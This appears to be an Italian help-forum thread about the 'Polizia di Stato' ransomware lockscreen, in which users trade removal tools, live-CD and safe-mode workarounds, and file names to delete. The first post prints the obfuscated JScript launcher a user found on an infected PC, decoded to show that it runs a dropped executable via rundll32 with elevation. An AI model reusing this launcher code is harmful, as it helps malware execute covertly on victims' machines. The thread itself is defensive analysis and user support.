Il contenuto è questo:
var w = String.fromCharCode(83)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(108)+String.fromCharCode(108)+String.fromCharCode(46)+String.fromCharCode(65)+String.fromCharCode(112)+String.fromCharCode(112)+String.fromCharCode(108)+String.fromCharCode(105)+String.fromCharCode(99)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(105)+String.fromCharCode(111)+String.fromCharCode(110);
var a = String.fromCharCode(67)+String.fromCharCode(58)+String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(87)+String.fromCharCode(73)+String.fromCharCode(78)+String.fromCharCode(68)+String.fromCharCode(79)+String.fromCharCode(87)+String.fromCharCode(83)+String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(115)+String.fromCharCode(121)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(109)+String.fromCharCode(51)+String.fromCharCode(50)+String.fromCharCode(92)+String.fromCharCode(92)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(108)+String.fromCharCode(108)+String.fromCharCode(51)+String.fromCharCode(50)+String.fromCharCode(46)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(101)+String.fromCharCode(32);
var s = String.fromCharCode(99)+String.fromCharCode(58)+String.fromCharCode(92)+String.fromCharCode(100)+String.fromCharCode(111)+String.fromCharCode(99)+String.fromCharCode(117)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(126)+String.fromCharCode(49)+String.fromCharCode(92)+String.fromCharCode(103)+String.fromCharCode(105)+String.fromCharCode(111)+String.fromCharCode(109)+String.fromCharCode(97)+String.fromCharCode(120)+String.fromCharCode(126)+String.fromCharCode(49)+String.fromCharCode(92)+String.fromCharCode(119)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(100)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(100)+String.fromCharCode(103)+String.fromCharCode(100)+String.fromCharCode(115)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(100)+String.fromCharCode(46)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(44)+String.fromCharCode(72)+String.fromCharCode(49)+String.fromCharCode(78)+String.fromCharCode(51);
var m = String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(115);
var activex = new ActiveXObject(w);
activex.ShellExecute(a,s,"",m,1);
WScript.Sleep(2000);
var r = String.fromCharCode(87)+String.fromCharCode(83)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(83)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(108)+String.fromCharCode(108);
var WSHShell = WScript.CreateObject(r);
WSHShell.Run(a+s);
all'apparenza non si capisce una mazza, visto che compone il codice usando la codifica chr dei caratteri.
Ma incorporando il codice in una pagina html e facendo il document.write delle variabili che usa, la cosa assume un significato più chiaro e il codice diventa questo:

var w = Shell.Application;
var a = C:\\WINDOWS\\system32\\rundll32.exe;
var s = c:\docume~1\giomax~1\wgsdgsdgdsgsd.exe ,H1N3;
var m = runas;
var activex = new ActiveXObject(w);
activex.ShellExecute(a,s,"",m,1);
WScript.Sleep(2000);
var r = WScript.Shell;
var WSHShell = WScript.CreateObject(r);
WSHShell.Run(a+s);

In pratica utilizza la shell di windows per eseguire il programma wgsdgsdgdsgsd.exe che era stato messo all'interno della cartella documenti.
Il tutto credo che venisse attivato da un collegamento presente in esecuzione automatica.
Quello l'ho proprio cancellato e non me lo sono salvato.


Come difese ho avira e malawarebyte
Il firewall di windows mi dice che o é disattivato o non impostato correttamente.. .

Non è un buon segno se il firewall ti risulta disattivato.
magari hai ancora qualche porcata in giro.
Provato HitmanPro se ti scova qualcosa ?

cut. . .
Non è un buon segno se il firewall ti risulta disattivato.
magari hai ancora qualche porcata in giro.
Provato HitmanPro se ti scova qualcosa ?

Provo!

Per il firewall me ne consigli uno laternativo a quello di windows?

Io ho eliminato avira e messo roboscan che ha anche il firewall, inoltre roboscan mi ha anche trovato lo stesso file di orianco che ha eliminato.
Sono felice del mio cambiamento per ora.

Il divino provalo, o prova Online Armor(firewall).

sono riuscito a riavviare!

sto scansionando, ma dato che non prendevo virus da anni e questo in 15 gg mi ha fregato 2 volte, non sto tanto tranquillo.


ho win7 e uso internet explorer

Come difese ho avira e malawarebyte

Il firewall di windows mi dice che o é disattivato o non impostato correttamente.. .

cosa dovrei fare per pararmi il . . . .

Grazie!

Provo!

Per il firewall me ne consigli uno laternativo a quello di windows?

http://www.hwupgrade.it/forum/showthread.php?t=2011681

Potete provare virit funziona molto bene soprattutto per la pulizia dei registri.. poi nel caso usate sardu e vi fate una bella chiavetta usb con tutto l'occorrente

Inviato dal mio GT-I9300 con Tapatalk 2

sono riuscito a riavviare!

sto scansionando, ma dato che non prendevo virus da anni e questo in 15 gg mi ha fregato 2 volte, non sto tanto tranquillo.


ho win7 e uso internet explorer

Come difese ho avira e malawarebyte

Il firewall di windows mi dice che o é disattivato o non impostato correttamente.. .

cosa dovrei fare per pararmi il . . . .

Grazie!

Ciao,

il firewall di Windows non è un FW è una ciofeca, blocca solo le applicazioni in uscita se preimpostate nelle sue regole.
Procurati un OnlineArmor o un firewall freeware che funzioni come si deve, ed applicaci un antivirus free leggero, magari l'Avira senza il riconoscimento delle applicazioni pericolose sconosciute (Pro-active). Il malware in questione sfrutta delle vulnerabilità del Java, entra tramite quello, magari disabilitando il plug-in (alcuni siti potrebbero non funzionare correttamente, tipo Facebook) del browser, potresti essere un pò più al sicuro.

bye

Quoto i suggerimenti che ti hanno dato.
Il firewall di windows non considerarlo proprio, ho fatto anch'io quell'errore sottovalutandone l'utilità :mad:
Adesso ho messo Online Armor e devo dire che in accoppiata con Avast, il sistema che è un obsoleto Athlon64 3200+ con 2 Gb di ram e s.o. XP, non risulta affatto rallentato.
Comodo l'ho scartato perchè una volta provandolo lo avevo trovato un po' troppo "invasivo", con finestre di popup che si aprivano molto frequentemente.
Siccome il pc non lo uso solo io, Armor è veramente ultra discreto.
Non rompe mai, è sempre lì bello tranquillo :)
Concordo anch'io sul discorso Java: ho veramente il sospetto che tutto sia nato proprio da lì, visto che malwarebytes aveva trovato elementi infatti nella cache di java.
Adesso che ho riformattato, non l'ho proprio più installato, e per ora siti che mi hanno dato problemi non ne ho ancora trovati.

salve a tutti, proprio ieri mi si è bloccato il pc con il virus "your computer had been locked" e non riesco a risolvere, sono entrato nella modalità provvisoria con prompt comandi (perchè nelle altre modalità il pc mi viene sempre bloccato) ho provato anche a fare esegui explorer.exe ma appena entro nel dekstop il virus mi blocca, vi prego, mi potreste aiutare a risolvere questo fastidioso problema??? grazie


dunqueeee, ho effettuato un ripristino e adesso funziona tutto come prima, sto facendo lo scan con spyhunter 4 e per ora mi ha trovato 320 minacce O______________________O è uno scherzo o può succedere??? XD cmq tra quei 320 ho trovato anche quello dell'FBI, spero di cancellarli tutti

salve a tutti, proprio ieri mi si è bloccato il pc con il virus "your computer had been locked"
Per curiosità, non è che ti ricordi dove sei andato (se puoi dirlo :oink: :D !) per beccartelo ?
Ho fatto una macchina clonata da quella che uso giornalmente per testare la nuova accoppiata antivirus+firewall, ma non riesco più a ribeccarmelo.

non te lo saprei dire con certezza, però o mi arrivato con qualche mail spam oppure installando qualche programma

Che cosa curiosa: stasera ho aperto questa pagina del forum sul pc con installato Avast, e l'antivirus mi blocca la pagina perchè trova un elemento malevolo.
Possibile che Avast legga il codice che ho riportato sopra e lo rilevi come una possibile fonte di infezione ?
Se fosse così non è male.
Adesso sono sul portatile con win8 e Windows defender e non segnala niente.

ciao ragazzi
mentre mia mamma navigava in internet sul mio pc, con il suo account, esce la schermata della polizia di stato etc... di pagare 100 euro ... e bla bla bla.
non si puó far nulla perchè non permette nessun tipo di azione.
l'unica è disconnettermi ed accedere al mio account, che non da problemi.
ho provato ad entrare in provvisoria su quell'account ma mi riavvia il pc!!
ora sto provando a scansionare ma
dal mio account.
anche disabilitato la connessione internet idem... che posso fare?
magari cancellare l'account?



Inviato da mio iPhone usando Tapatalk

Dalla scansione dal tuo account non ha trovato nulla? Dovrebbe rilevarlo ugualmente. Se così non fosse, elimina i file manualmente. Cerca nel topic i nomi.

sto scansionando ora e in effetti sta trovando parecchi virus.

ma senza visitare sito strani comunque.
bha che s'iventano per far soldi...

scansionato e tolto i vorus...
ma appena vado all account incriminato, di mia mamma, si blocca ... posso solo rientrare con il mio.

che faccio? :(

Inviato da mio iPhone usando Tapatalk

Cerca nell'esecuzione automatica di quell'account se richiama dei link o eseguibili strani.
Dovresti anche trovare nella cartella documenti un .js e un .exe con dei nomi strani, tipo dsgsdgdsgdsgw.
Tira via tutta quella roba, poi il sistema dovrebbe riuscire ad avviarsi.
Ma ovviamente non vuol dire che sei pulito, quello ti serve solo per non far uscire più la finestra che ti blocca.
Dopo usa combofix e analizza tutto per bene.

ma non mi ci fa entrare in quell'account :(
o meglio... ci entro ma poi si blocca. e l'unica è uscire e entrare con l'altro.



Inviato da mio iPhone usando Tapatalk

Ok ma con l'utente sano non riesci ad accedere ai files dell'account di tua madre ?
Che s.o. usi ?
Altrimenti potresti usare un cd live.

guarda ho risolto, spero, cancellando l'account e creandone uno nuovo.

spero non succeda anche a me... è davvero malefico come tipo dinfezione.
ma come puo' manifestarsi?


Inviato da mio iPhone usando Tapatalk

guarda ho risolto, spero, cancellando l'account e creandone uno nuovo.

spero non succeda anche a me... è davvero malefico come tipo dinfezione.
ma come puo' manifestarsi?


Inviato da mio iPhone usando Tapatalk

Visitando un sito compromesso

eh ma mia mamma non naviga su chissa quale siti eheh vabbe penso sia indifferente comunque.



Inviato da mio iPhone usando Tapatalk

Infatti, non c'entra nulla il fatto di visitare "certi" siti :oink: .
La stessa cosa è capitata anche a me, che non sono propriamente uno sprovveduto, con un s.o. genuino e con tutti gli aggiornamenti di w.u. allineati, antivirus (MSE purtroppo, poi subito rimosso), e visitando siti assolutamente leciti e seri ma evidentemente compromessi.

Piuttosto volevo chiederti una cosa: quando hai disinfettato, hai trovato tracce di virus anche nella cache di Java ?
Secondo me è attraverso qualche applet che il virus viene iniettato sul pc.
Fra l'altro verifica di avere aggiornato Java, qualche settimana fa era uscita la notizia di una falla molto pericolosa in Java e consigliavano l'upgrade immediato ad una versione corretta.

Infatti, non c'entra nulla il fatto di visitare "certi" siti :oink: .
La stessa cosa è capitata anche a me, che non sono propriamente uno sprovveduto, con un s.o. genuino e con tutti gli aggiornamenti di w.u. allineati, antivirus (MSE purtroppo, poi subito rimosso), e visitando siti assolutamente leciti e seri ma evidentemente compromessi.

Piuttosto volevo chiederti una cosa: quando hai disinfettato, hai trovato tracce di virus anche nella cache di Java ?
Secondo me è attraverso qualche applet che il virus viene iniettato sul pc.
Fra l'altro verifica di avere aggiornato Java, qualche settimana fa era uscita la notizia di una falla molto pericolosa in Java e consigliavano l'upgrade immediato ad una versione corretta.

si tra quelli alcuni erano anche di java...
comunque non era aggiornato, l'ho updato adesso :-)


Inviato da mio iPhone usando Tapatalk

Salve a tutti,
non so come abbia preso questo virus non frequento siti "hot"... ma stavo accettato una pagina su fb da approvare sul mio diario che subito il pc con avira antivir ha rilevato virus e io cliccato su cancella ma non è mai arrivato alla fine perché ne sono uscite 3 o 4 e subito dopo la pagina bianca con polizia di stato... Subito ho spento il pc e cercato di entrare in modalità provvisoria ma niente. Ho i dns di Google. Ho fatto una scansione con avira rescueCD ha trovato i virus solo che ora appena inserisco la password esce la schermata tutta bianca con la sola freccia del mouse... Ho win7 32bit. Non so perché avevo un altro utente protetto da password e li posso fare tutto senza problemi. Ho avviato malwarebytes trovato i virus, cancellati ma niente sempre la solita schermata bianca. Come posso risolvere senza poter andare in modalità provvisoria ma utilizzando il profilo utente pulito?

stessa cosa schermo bianco
tu hai risolto? come?

Se non si riesce ad entrare in modalità provvisoria, servirebbe o una chiavetta usb partente tipo sardu o una distro live tipo ubuntu, poi si va sull'hd e si cerca cosa parte in automatico.
Considerate che non è un vero e proprio virus, a volte va a modificare il file explorer.exe e quindi non parte nemmeno la mod. Provvisoria e gli antivirus non lo riconoscono... guardate i registri di sistema

Inviato dal mio GT-I9300 con Tapatalk 2

devi partire con un cd/usb di avvio (bartpe, ubcd4win, win7pe) e lanciare hijackthis
selezioni il sistema infetto C:/windows e l'utente
cancelli le voci in avvio (04)

stesso problema;
schermo bianco e la modalita' provvisoria non va. l'unica cosa il promp dei comandi in modalita' provvisoria: da li sono riuscito ad accedere a msconfig> opzioni di avvio ma di file ''strani'' non ci sono. si riesce a bloccare i programmi che sono in esecuzione automatica dal prompt?

oppure, avete altre soluzioni?

Sicuro che non hai dei collegamenti a qualcosa di strano in esecuzione automatica ?
Guarda i primi post che ho messo in questa discussione, mi pare che da qualche parte avessi messo i nomi dei files responsabili della schemata che bloccava il pc.

stesso problema;
schermo bianco e la modalita' provvisoria non va. l'unica cosa il promp dei comandi in modalita' provvisoria: da li sono riuscito ad accedere a msconfig> opzioni di avvio ma di file ''strani'' non ci sono. si riesce a bloccare i programmi che sono in esecuzione automatica dal prompt?

oppure, avete altre soluzioni?

http://www.hwupgrade.it/forum/showpost.php?p=38839859&postcount=110

http://www.hwupgrade.it/forum/showpost.php?p=38839859&postcount=110

grazie, provo.

Eccomi!
presente!
Ci sono anche io tra i fortunatissmi-issimi-issimi del virus!
Beccato 10 giorni fa navigando sul web (con IE)
Anche io -come hanno già detto altri- non ho mai visto niente di tanto "fetente" in venti anni (ho cominciato con un 286 che aveva il disco così grande... così grande... cose che voi umani non avete mai visto... così grande che il Dos 3.3 non riusciva neanche gestirlo, ben 40 MB ed un amico me lo ha partizionato in 2).
Un virus che pianta il computer all'avvio, che non parte neanche in modalità provvisoria, niente di niente.
Mi ero preoccupato seriamente ed ero già pronto per togliere il disco fisso.
Sennonchè leggendo qui (grazie forum!!) l'idea giusta: fare un CD bootabile. Anzi, ne ho fatti addirittura 2: uno di Win e l'altro di Avira ma è stato sufficiente il primo per riaccendere la macchina e fare un "Ripristino configurazione di sistema" a 2 giorni antecedenti il fattaccio e così, molto più velocemente del previsto, la macchina è tornata bella e funzionante senza particolari problemi.
Ma siccome mi ero già preparato sia mentalmente che come dotazione di dischi esterni per fare back-up e quindi formattare tutto, ho appunto copiato tutti i dati e formattato lo stesso.
Resta comunque l'esperienza di questo bel virus che ha superato le difese di AVG 2013 sempre aggiornato ogni giorno, o comunque ad ogni connessione internet.
Il seguito qui: http://www.hwupgrade.it/forum/showthread.php?p=39248619&posted=1#post39248619

Purtroppo non essendo un vero e proprio virus, spesso non viene riconosciuto e quindi infetta comunque.
Vi consiglio di cercare "sardu" e farvi una bella chiavetta usb utilissima anche in questi casi

Inviato dal mio GT-I9300 con Tapatalk 2

Ho questo "virus", e per ora non sono riuscito a toglierlo.

Quello che sono riuscito a fare, è di "scavalcare" il file di avvio atomatico del programma nel seguente modo:

1-Avvio normale (win7)
2-Appena appare l'icona dell'utente cliccarla subito
3-Subito dopo sciacciare alt+ctrl+canc e schiacciare senza indugi il tasto spengi il pc.
4-Talvolta, anzi spesso, essendo il pc in un momento in cui sta caricando i programmi, appare il messaggio di aspettare di chiudere i programmi prima di spengere il pc.
5-Appena appare questo messaggio ""molto velocemente"" sciacciate annulla.
6-A questo punto il pc continua la fase di avvio, e funziona regolarmente in tutto. Ma ovviamente il "virus" si rifarà vivo al prossimo avvio quindi va rimosso.
7-male che vada il pc si spegne e si può riprovare. Non è difficile però riuscire, dopo un paio di tentativi. (ormai vado quasi a colpo sicuro)


E qui la domanda:

Come rimuoverlo senza fare danni avendo il vantaggio di poter utilizzare il pc in modalità normale?
Cosa cerco?

Ho eliminato tutti i programmi da avvio automatico con il risultato della schermata bianca anziché con la polizia.

Il pc funziona in tutto e per tutto da una settimana (non essndo un virus ma solo un programma che si parte automaticamente solo all'avvio), ma non so cosa devo eliminare e vorrei evitare programmi automatici che buttano via ogni cosa sospetta rischiando di sconfigurare il pc.

Ciao

Combofix e malwarebyte una sicurezza

Inviato dal mio GT-I9300 con Tapatalk 2

Mi sono beccato questo virus alcuni mesi fa, ma nel mio caso si andava in modalità provvisoria! Ho risolto con Combofix! Però cmq ha lasciato degli strascichi! La cartella degli amministratori è un po' incasinata, mi sono apparsi file e cartelle un po' in tutto l'hd (che io ho lasciato dove sono) e non riesco a installare alcuni programmi (giochi nemmeno uno e per esempio silverlight)!!
Ultimamente il pc da segni di insofferenza, un errore grave di Xp, pagine web visualizzate male e ultimo quando vado a scrivere nella casella di google, a volte non scrive la prima lettera!! Ah anche l'orario in basso a destra di xp non è più in formato 24H ma in am e pm!! Mah!!

Io o fatto un Ripristina configurazione di sistema a qualche giorno prima

che nervoso.. ieri ci chiama la madre della mia ragazza disperata perkè doveva pagare sti 100€..

torniamo a casa di corsa e vedo quella schifezza di pagina del virus..

vabbè.. provo tutte le soluzioni trovate online (non andava la modalità provvisoria).. ma NULLA.. al vecchio pc non piaceva il boot da chiavetta.. avg rescue non trovava NESSUN virus..
le chiavi di registro che online dicono di sistemare e controllare non presentavano nulla di anomalo.. cercato tra le cartelle possibili (tipo quelle di avvio automatico) e non c'era nulla di anomalo..

provo con la mod prov. e prompt dei comandi (unica che funzionava) ma anche li non si riusciva a fare niente..

morale? 3 ore buttate nel cesso a sclerare..
oggi torno li col dvd di windows vista (eh si ha su w.vista home premium......).. 10 minuti di ripristino e risolto tutto.. -.-'

;39262754']
Soluzione 1: vedere questa discussione su HitmanPro (http://www.hwupgrade.it/forum/showthread.php?t=2539794)

Ho risolto con Combofix! Però cmq ha lasciato degli strascichi! La cartella degli amministratori è un po' incasinata [...] non riesco a installare alcuni programmi [...]


Appunto, vorrei evitare soluzioni tipo combofix, o hitmanpro, che temo incasinino il pc, e allora il virus non ci sarà più, ma il pc è da formattare...

Questi programmi spesso sono da usare come ultima spiaggia... Io posso intervenire con il pc acceso e perfettamente funzionante. Vorrei sapere dove andare a cercare questi 2 o tre files della "polizia".

Nei virus che permettevano la modalità provvisoria, bastava andare in avvio automatico.. qui non basta, ci deve essere qualche file di registro.

Un ripristino alla data precedente, danni non ne dovrebbe fare. Ma cancellerebbe questi files?

Guarda io uso questi programmi praticamente tutti i giorni e per me l'ultima spiaggia è proprio la formattazione,visto che i miei clienti non la prenderebbero bene,mai avuto problemi,non si possono usare su server,questo si,ma per il resto... Vai tranquillo

Che ne pensate di Microsoft Security Essentials ?

Direi che fa abbastanza schifo... con tutti gli antivirus gratuiti che ci sono, quello è l, ultimo

Inviato dal mio GT-I9300 con Tapatalk 2

Intanto informo che ho risolto con hitmanpro, e ringrazio Claudio per avermelo segnalato. Forse non mi ero spiegato bene, ma volevo evitare assolutamente qualunque rischio di dover riformattare, in quanto ho una configurazione molto complessa. Temevo che un programma tipo HitmanPro, potesse fare qualche danno. E' andata bene ed è tutto OK! :) :) :)

Comunque per chi si trovasse con lo stesso problema, consiglio il metodo che ho descritto nella pagina precedente per riportare il pc alla normale funzionalità (fino al successivo riavvio), per poi, comodamente e con tutti i vantaggi del caso, eliminare il ""virus"" con HitmanPro o programmi analoghi.

ho provato tutte le soluzioni trovate in giro, senza successo:
- da modalità provvisoria sono riuscito ad avviare startupmechanic e ho disabilitato tutti i programmi in avvio automatico; ho cancellato tutto dalla cratella "esecuzione automatica"; nel registro la chiave SHELL contiene explorer.exe
- da modalità normale sono riuscito ad avviare msconfig e a disabilitare tutti i programmi in avvio automatico

Niente da fare, il virus continua ad avviarsi!
Ma com'è possibile???

Devo ancora provare CD o chiavette di avvio con antivirus, nel frattempo avete qualche altro suggerimento su dove andare a stanare questo scassaminch*ia di virus?

Hai provato a cercare se hai dei files che si chiamano così:
dsgsdgdsgdsgw.js
wgsdgsdgdsgsd.exe

Se li trovi eliminali, anche se i nomi potrebbero essere cambiati rispetto a quando me lo sono beccato io.

ho provato tutte le soluzioni trovate in giro, senza successo:
- da modalità provvisoria sono riuscito ad avviare startupmechanic e ho disabilitato tutti i programmi in avvio automatico; ho cancellato tutto dalla cratella "esecuzione automatica"; nel registro la chiave SHELL contiene explorer.exe
- da modalità normale sono riuscito ad avviare msconfig e a disabilitare tutti i programmi in avvio automatico

Niente da fare, il virus continua ad avviarsi!
Ma com'è possibile???

Devo ancora provare CD o chiavette di avvio con antivirus, nel frattempo avete qualche altro suggerimento su dove andare a stanare questo scassaminch*ia di virus?

HitmanPro in modalità Kickstart

http://www.hwupgrade.it/forum/showthread.php?t=2539794

Hai provato a cercare se hai dei files che si chiamano così:
dsgsdgdsgdsgw.js
wgsdgsdgdsgsd.exe

Se li trovi eliminali, anche se i nomi potrebbero essere cambiati rispetto a quando me lo sono beccato io.

non posso! dopo 1 o 2 minuti che sta in mod. provvisoria, il pc si spegne! :muro:

Ma non avviare il pc da windows se è incasinato.
Scarica (da un altro pc ovviamente) una ISO per creare qualche CD live e parti con il boot da CD.
Anch'io ero nella tua situazione, a me non si spegneva ma anche in modalità provvisoria rimaneva bloccato.
Ho scaricato il cd con il sistema operativo "live" Ultimate Boot CD for Windows (http://www.ubcd4win.com/), e sono partito da lì.
Una volta avviato trovi un sacco di tools già preinstallati, sia per esplorare le cartelle, sia per fare scansioni antivirus.

Oppure segui l'indicazione di Chill-Out

Prova crearti un antivirus live su cd con i vari avg, kapersky, bitdefender

Inviato dal mio GT-I9300 con Tapatalk 2

Anche ComboFix ha fallito, l'ho lasciato a lavorare, è arrivato fino alla fase 54 e oltre, poi me ne sono andato, e tornato dopo un'ora ho trovato il PC spento, ma all'avvio risultava ancora infetto.

Ora ho scaricato HitmanPro, che promette miracoli, sto preparando un CD bootabile di Kasprsky, vediamo un po'.

Intanto, un appunto per i posteri: è difficile che un virus che si avvia quando parte windows possa influire in qualche modo sul tasto F8 e la modalità provvisoria: perchè il tasto F8 funzioni, va premuto tante tante tante volte subito dopo l'accensione del PC, perchè anche se in realtà basterebbe premerlo una volta dopo il BIP di avvio, i PC moderni sono troppo veloci per dare tempo a un umano di premere il tasto in tempo... Premendolo più volte, il codice del tasto viene memorizzato nel buffer di tastiera, e poi il PC lo leggerà appena possibile.

Altra nota: a me in modalità provvisoria "normale" il PC non si avvia, ma in modalità provvisoria con prompt dei comandi sì.

Mi chiedo, infine, cosa succede se metto IO un programma MIO in autoavvio, dalla modalità provvisoria, che si avvii e si metta in primo piano 2 o 3 minuti dopo l'avvio: chissà se riuscirebbe a mettersi "davanti" al Ransom Virus? :mbe: No perchè, se funziona, diventa banale sbloccare il sistema, è sufficiente che questo programma mandi in primo piano explorer.exe !
Forse TROPPO banale... :stordita:

Se hai un altro pc, cerca e fatti una chiavetta con SARDU da lì puoi far partire un sacco di antivirus e se carichi hirens cd anche un Windows xp live molto comodo

Inviato dal mio GT-I9300 con Tapatalk 2

Hai provato a tenere il pc scollegato da Internet quando lo avvii in modalità provvisoria ?
Alcuni segnalavano che senza connessione attiva, la finestra non si apriva e riuscivano ad operare sul pc.

staccare la rete è la prima cosa che ho fatto, e non ho intenzione di riattaccarla finche non mi sono liberato di questo scassapa**e di un virus.

E anche HitmanPro Kickstarter ha fallito! :muro:
Niente in modalità 1, niente in modalità2,.... in Modalità 3 parte, arriva al 99%, trova un sacco di cookies ma una sola infezione, in skype, che nanche avevo attivo... poi si blocca e non funziona più niente.

Passo al CD di avvio di Kaspersky; al momento mi dice che finirà la scansione tra 6 ore e che per adesso ha trovato 3 minacce, ma a vederle, nessuna mi sembra assomigliare al ransom virus.
'mmazza che rottura de ***** :muro:

Guarda se davvero non mi tocca scrivermi da solo un programma che si pianta davanti alla schermata del virus! :mad:

Ma se metto in autoavvio il programma dalla modalità provvisoria, poi mi parte anche in modalità normale?

A momenti fallisce anche il boot disk di Kaspersky!
Invece la modalità 3 ha funzionato, anche se non come speravo: pensavo di trovare la mattina dopo il PC acceso con una schermata di riepilogo di KasperSky... invece l'ho trovato spento!
Pero', per fortuna, riaccendendolo è risultato a posto.
Però non sono soddisfatto, volevo vedere un report di cosa ha trovato? Potrebbe averlo salvato da qualche parte prima di spegnere tutto?

;39322313']Quel che conta è che tu abbia risolto il problema.


Un pochino macchinoso (non ho dubbi sul fatto che funzioni), ma in casi davvero estremi, la soluzione migliore resta:

ho provato questa procedura ma non mi si avvia. in pratica passo 1 e 2 non fanno nulla se seleziono il 3 mi si impalla sul logo di caricamento di windows. altre soluzioni per rimuovere questo maledetto virus?

beccato stamani da un mio amico:
al momento, cmq, gli sta facendo assistenza un altro :fiufiu: ...

Di lusso!! :sofico:

beccato stamani da un mio amico:
al momento, cmq, gli sta facendo assistenza un altro :fiufiu: ...

Di lusso!! :sofico:

Meglio, ti risparmi un sacco di rogne ... :D

appunto....:yeah:

Il problema è che ri-sarà da capo entro breve:
chiamatemi pure precog (http://it.wikipedia.org/wiki/Minority_Report) :D ma è come vederla in anticipo...

che poi, al di là della rogna legata alla rimozione, penso che cosi' di prim'acchito vedersi sul monitor "Polizia postale: hai violato [...]" ti faccia venire anche una sincope :asd: ..

Il problema è che ri-sarà da capo entro breve:
chiamatemi pure precog (http://it.wikipedia.org/wiki/Minority_Report) :D ma è come vederla in anticipo...

Beh ma non è detto.
Quando me lo sono preso io, stavo visitando siti assolutamente leciti e sono sicuro di non aver cliccato su nessuna richiesta strana di installazione.
Una volta rimosso e pulito il pc, ho fatto e copiato l'immagine dell'HD su un altro pc eletto a vittima sacrificale, e sono tornato a visitare gli stessi siti prendendo tutti gli url dalla cronologia del browser della sera prima.
Ebbene non è successo più niente.
Magari a volte sono dei banner pubblicitari che girano a rotazione nei siti, che sono stati infettati ad insaputa del titolare del sito stesso.
Se hai la sfiga di capitare sul sito nel momento in cui scorre quel banner, ti cucchi ... il porcellum :D !

Scusate, il virus si prende con un installazione sul pc, molte volte ad insaputa dell'utente, la mia domanda è , ma i software di protezione hanno il controllo sui download, quindi possibile che non si venga avvisati che sta partendo un download?
:stordita:

Ciao si quanto affermi è vero, ma ti diro' che non sempre il problema si verifica su siti non affidabili, io ad esempio ho avuto, ma prontamente bloccato dal software di protezione la comparsa del virus sul sito del CORRIERE DELLA SERA.

salve a tutti.
ho già postato una richiesta in questo forum ma ora mi sono accorto che questa mi sembra la sezione più adatta. qualche settimana fa ho preso il virus poliz postale , poi dopo alcune prove di pulizia con vari tools sembravo aver risolto il problema - ora però la navigazione risulta lenta e le pagine web non caricano mai. seguendo le regole di disinfezione da voi consigliate non ho trovato virus. mi chiedo, possibile che in realtà non abbia eliminato definitivamente il virus? avete qualche consiglio? vi ringrazio ancora e chiedo scusa per l'insistenza :)

Riesumo un po' il post per segnalare che è stato rilasciato un programmino molto leggero HitmanPro.Alert (http://www.surfright.nl/it/cryptoguard) da lasciare in background, che dovrebbe proteggere durante la navigazione e impedire l'effetto più invasivo dei ransomware, vale a dire trovarsi l'hard disk con i vari documenti e files criptati.
Alla pagina linkata c'è anche un video che ne illustra il funzionamento durante un attacco subito navigando in un sito infettato.

questo virus se l'è beccato mio babbo sul portatile qualche giorno fa.
Per quanto mi riguarda bootando da penna usb col disco di ripristino karspersky non ho risolto nulla,invece con HitmanPro.Kickstart sono riuscito a debellarlo

Riesumo questa discussione perchè ho un problema con un tablet è un Samsung Galaxy modello SM-T110.
All'avvio compare quasi immediatamente la schermata famosa, e non si riesce ad accedere a menù o altro.
Riesco ad entrare in modalità provvisoriae e ho riscontrato in download un file che sicuramente a a che fare con questo problema e l'ho eliminato ma ovviamente a nulla è servito.
Ho disinstallato Chrome ma niente da fare.
Se c'è un app specifica che si possa ricollegare a questo virus non ne ho idea.
Ho provato a scaricare l'antivirus ma non me lo fa vedere nelle icone, potessi almeno fare una scansione... Sapreste aiutarmi?
Grazie :)

Ma è con android?

E' con Android.
Avevo provato a bloccare qualche servizio come Chrome, 'browser', ma non è servito a nulla. Alla fine ho optato per il reset, con questo problema ho risolto.
Comunque grazie.